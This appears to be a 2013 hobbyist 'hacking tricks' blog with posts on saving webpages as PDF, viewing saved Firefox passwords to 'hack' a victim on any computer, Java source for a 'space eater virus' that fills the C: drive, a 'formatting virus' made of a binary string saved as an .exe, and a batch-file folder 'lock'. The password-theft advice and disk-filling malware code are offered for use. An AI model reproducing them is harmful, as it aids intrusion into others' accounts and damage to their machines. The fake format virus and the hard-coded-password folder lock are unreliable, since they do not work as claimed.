Menu

Thursday, November 28, 2013

Trick For Convert A Webpage into PDF File.

1. Open the Google Chrome Browseron your PC or MAC
2. Then go to the web page that you want to convert as a PDF.
3. Now press Ctrl+P on Windows PCor Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser.
4. Now Change the destination to “Save As PDF” and hit the save button.
5. The current web page will instantly be downloaded as a PDF document.
Enjoy.


Wednesday, November 27, 2013

Hack Saved Passwords on Firefox .

1. Open FirefoxWeb Broweser

2. Then Click on FireFox>Option>

3. Then a POP Upbox will appear, In that go tosecurityand click onShow Passwords.

4. Now click on website whose password you want to see ans click onshow passwordas shown in below image. (It will ask for confirmation so click on "yes" when dialog boxappears)

5. Cool, You have hacked password of your victim with the simple steps. You can try this at any computers.

Enjoy..

*Note : I am providing the informations only for educational purpose.,so i am not responsible for any other issues.

Tuesday, November 26, 2013

Space Eater Virus Creation using JAVA

*.Open Notepad and type the following virus code:

import java.io.*;
class Virus
{
public static void main(String ar[]) {
try
{
FileWriter f=new FileWriter("C:/WINDOWS/Virus.dll",true); while(true)
{
f.write("Programming Is Such A FUN !!!");
}
}
catch(FileNotFoundException e){}
catch(IOException e){}
}
}

*. Save it asVirus.java

*.Now generate the byte code of program using Java Compiler.

*.When you execute this program It will start eating the space of your C drive. To stop this virus simply close the command window.

*.In order to recover the lost space of your drive. go to C:\WINDOWS and delete the file virus.dll (also from Recycle bin)

Explanation: On execution this program will create a file calledvirus.dllat the location C:\WINDOWS and start increasing its size by sending the junk data into it which automatically increase the size of the disk.



*Note : I am providing the informations only for educational purpose.,so i am not responsible for any other issues.

Saturday, November 23, 2013

Hard Disk Formating Simple Virus Creation.

» Copythe below codes intoNotepad.

01001011000111110010010101010101010000011111100000

» Save the file asFormat.exe

You have created your virus. Enjoy !!!



*Note : I am providing the informations only for educational purpose.,so i am not responsible for other issues.

Thursday, November 21, 2013

Protect Your Folder With Password Without Any Software.

To Lock Folder »
1. Open Notepad and Copy code given below into it.

cls @ECHO OFF title c4cyber.blogspot.com if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST MyFolder goto MDMyFolder :CONFIRM echo Are you sure to lock this folder? (Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to Unlock Your Secure Folder set/p "pass=>" if NOT %pass%==coolhacksgoto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder echo Folder Unlocked successfully goto End :FAIL echo Invalid password goto end :MDMyFolder md MyFolder echo MyFolder created successfully goto End :End